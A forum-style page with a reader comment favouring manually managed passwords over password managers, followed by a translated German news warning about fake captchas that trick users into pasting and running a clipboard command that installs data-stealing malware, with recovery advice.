Blog Post
I agree that strong, unique passwords are essential for security. Saving passwords can be safe, but I personally prefer to keep everything compartmented. This means that if one account gets compromised, there's no way for an attacker to use that information to access my other accounts.
This is exactly why I think using a password manager is a bad idea. Even if it's well-protected and encrypted, there's always a risk of it being compromised. If that happens, all stored passwords could potentially be exposed at once. Keeping passwords separate and manually managed reduces the impact of a single breach.
I wish I could find my old article on phishing so I could contribute more to the discussion, but it seems to be lost in one of the older security newsletters.
Keep up the great work!
Hey all got some new news for you out of Germany. I translated the news article into English and there might be some minor mistakes but I am sure you all will get the meaning:
Checkbox as Bait You're not a robot? Malware could be lurking behind captchas. Everyone is familiar with checkboxes or image challenges to prove that you're a human and not a machine. This gives so-called captchas a certain level of trust. Cybercriminals exploit this mercilessly.
Anyone who currently encounters "I am not a robot" captchas when opening websites should be especially cautious after clicking the green confirmation checkbox. If access to the site is granted as normal after checking the box, everything is fine.
However, if another banner appears after the checkbox prompt with instructions to execute keyboard shortcuts, you've landed on a highly dangerous, manipulated website that intends to inject malware onto your computer. The Federal Office for Information Security (BSI) is currently warning against this again. In this case, abort immediately and close your browser.
If captchas require key combinations, something is wrong.
The attack method first appeared at the end of 2024 and was documented by the Swiss Federal Office for Cyber Security (BACS): The fact that the initial attempt was already a fake captcha becomes clear when a second banner appears, demanding the execution of various key combinations for alleged further verification.
The perfidious attack explained in detail:
- By checking the "I am not a robot" captcha box, a malicious command has already been copied to the clipboard. And here's what the cybercriminals want unsuspecting users to do next:
- In the second banner, they are then prompted to open a Windows input field using a keyboard shortcut.
- Using another keyboard shortcut, they are then supposed to paste the dangerous command from the clipboard into the input field and then execute it.
- Malware is then downloaded and installed from an attacker's server, which has devastating capabilities, such as: Collecting information, for example from the operating system, web browsers, or messengers; Stealing sensitive access or payment information, such as passwords or credit card details; Attacking crypto wallets or authentication processes, such as those for online banking; Executing any other commands; Injecting any other malware.
Since many malware programs make profound changes to the system that cannot be easily reversed, victims should restart their entire computer as a precaution after an actual infection with the malware from the CAPTCHA attack, advises the BACS.
After an infection, victims must take action. This means in detail:
Reinstall the operating system completely and, if possible, restore their data from backups on external storage devices. If there is no or no up-to-date data backup on external storage devices, which no user should be without, their data must of course be backed up before reinstalling the computer. Additionally, as a precaution, all online account passwords should be changed, especially those for email accounts.